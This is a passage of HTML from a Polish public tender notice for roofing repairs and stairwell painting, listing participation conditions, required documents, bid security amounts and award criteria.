id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-05-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający uzna za spełnienie warunku jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 50 000,00 zł. dla części I, II i IV, dla części III i V 20 000,00 zł </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"> W przypadku złożenia ofert na więcej niż jedną część obowiązuje jedna najwyższa stawka </span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">2.3.	W celu wykazania spełnienia warunku zdolności technicznej lub zawodowej dla Części I i II:Zamawiający uzna za spełnienie warunku jeżeli Wykonawca wykaże, że:a)	należycie wykonał w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie , co najmniej dwie roboty budowlane polegające na remoncie pokryć papowych lub wykonania pokryć papowych na budynkach mieszkalnych wielorodzinnych lub użyteczności publicznej wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty zostały wykonane należycie, w szczególności informacje o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze nie jest w stanie uzyskać tych dokumentów - inne dokumenty (zał. nr 4)b)	dysponują potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, w tym co najmniej jedna osoba posiadająca uprawnienia w zakresie wykonywania robót dekarskich.2.4.	W celu wykazania spełnienia warunku zdolności technicznej lub zawodowej dla Części III i IV:Zamawiający uzna za spełnienie warunku jeżeli Wykonawca wykaże, że:a/ należycie wykonał w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie , co najmniej dwie roboty budowlane polegające na wykonaniu robót malarskich klatek schodowych w budynkach mieszkalnych wielorodzinnych lub użyteczności publicznej (zał. nr 4a)</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Tak</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">2.5.	Informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13,14 i 21 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.2.6	Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy Pzp2.7	Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonana decyzji właściwego organu.2.8	Zaświadczenie właściwej terenowo jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, ze wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególnościuzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonana decyzji właściwego organu.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">2.1.	Dla Części I i II:Wykaz robót w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie , co najmniej dwie roboty budowlane polegające na remoncie pokryć papowych lub wykonania pokryć papowych na budynkach mieszkalnych wielorodzinnych lub użyteczności publicznej wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty zostały wykonane należycie, w szczególności informacje o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze nie jest w stanie uzyskać tych dokumentów - inne dokumenty (zał. nr 4)2.2	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (zał. nr 5) 2.3	Dla Części III i IV: Wykazu robót malarskich klatek schodowych wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy (zał. nr 4a),2.4.Dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę co najmniej 50 000,00 zł. dotyczącej części I, II i IV oraz 20 000,00 dla części IV </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci">2.1.	Dla Części I i II:Wykaz robót w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie , co najmniej dwie roboty budowlane polegające na remoncie pokryć papowych lub wykonania pokryć papowych na budynkach mieszkalnych wielorodzinnych lub użyteczności publicznej wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz których roboty zostały wykonane należycie, w szczególności informacje o tym, czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty zostały wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze nie jest w stanie uzyskać tych dokumentów - inne dokumenty (zał. nr 4)2.2	Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (zał. nr 5) 2.3	Dla Części III i IV: Wykazu robót malarskich klatek schodowych wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów określających czy te roboty zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy (zał. nr 4a),2.4.Dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę co najmniej 50 000,00 zł. dotyczącej części I, II i IV oraz 20 000,00 dla części IV </span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.	Zamawiający wymaga wniesienia wadium w wysokości:W odniesieniu do Części I : 3.500,00zł (słownie: trzy tysiące pięćset 00/100zł).W odniesieniu do Części II : 10.000,00zł (słownie: dziesięć tysięcy 00/100zł). W odniesieniu do Części III : 500,00zł (słownie pięćset 00/100zł)W odniesieniu do Części IV : 2 500,00 (słownie dwa tysiące pięćset 00/100zł)W odniesieniu do Części V : 500.00 (słownie pięćset 00/100zł)2.	Wadium może być wnoszone w jednej lub kilku formach:1/	w pieniądzu na rachunek bankowy Zamawiającego ;2/	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;3/	gwarancjach bankowych;4/	gwarancjach ubezpieczeniowych;5/	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.3.	Wadium wnoszone w pieniądzu wnosi się przelewem na rachunek bankowy zamawiającego w Banku Gospodarstwa Krajowego Oddział w Toruniu nr 93 1130 1075 8100 0000 0001 2775. Do oferty należy dołączyć kopię dowodu wniesienia wadium.4.	Z treści poręczenia, gwarancji, winno wynikać jednoznacznie bezwarunkowe, na pierwsze pisemne żądanie Zamawiającego - zobowiązanie gwaranta, poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w przepisie art. 46 ust. 5 oraz art. 46 ust. 4a ustawy Pzp. 5.	Wadium w postaci poręczeń, gwarancji, należy złożyć w oryginale w siedzibie Zamawiającego a kserokopię potwierdzoną za zgodność z oryginałem dołączyć do oferty. 6.	Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust. 8 i 9 niniejszego paragrafu.7.	Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.8.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złoży dokumentów lub oświadczeń potwierdzających okoliczność, o których mowa w art. 25 ust. 1, jednolitego dokumentu, o którym mowa w art. 25a ust. 2, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty przez wykonawcę jako najkorzystniejszej..9.	Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:1/	odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;2/	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;3/	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.Wadium wniesione przez jednego z Wykonawców występujących wspólnie (np. konsorcjum) uważa się za wniesione prawidłowo.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna"></span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>95,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>5,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Nie</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> 